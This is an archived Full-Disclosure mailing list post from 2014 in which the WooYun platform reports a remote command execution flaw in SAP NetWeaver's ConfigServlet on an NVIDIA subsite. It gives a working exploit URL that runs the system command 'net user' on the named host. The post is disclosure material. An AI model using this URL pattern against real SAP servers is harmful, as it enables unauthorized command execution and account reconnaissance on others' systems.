lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAPQ_=KVCH0WnLkyJpmcZFu73myo2cw2F5=MgOJ886rvM-O+jCA@mail.gmail.com> Date: Wed, 8 Jan 2014 00:25:48 +0800 From: "En.wooyun.org" <help.en@...yun.org> To: full-disclosure@...ts.grok.org.uk Subject: [Wooyun] NVIDIA a SAP NETWEAVER remote command execution *Abstract:* NVIDIA a subsite SAP NETWEAVER remote command execution. *Details:* url: https://nvcare.nvidia.com/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=net%20user *Proofs of concept:* *[image: 内嵌图片 1]* *Form:* http://en.wooyun.org/bugs/wooyun-2013-041 -- WooYun, an Open and Free Vulnerability Reporting Platform For more information, please visit *http://en.wooyun.org/about.php <http://en.wooyun.org/about.php?>* Content of type "text/html" skipped Download attachment "212213051a2e1fc2bc49fe27938c719b6bb81e2e.jpg" of type "image/jpeg" (114662 bytes) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/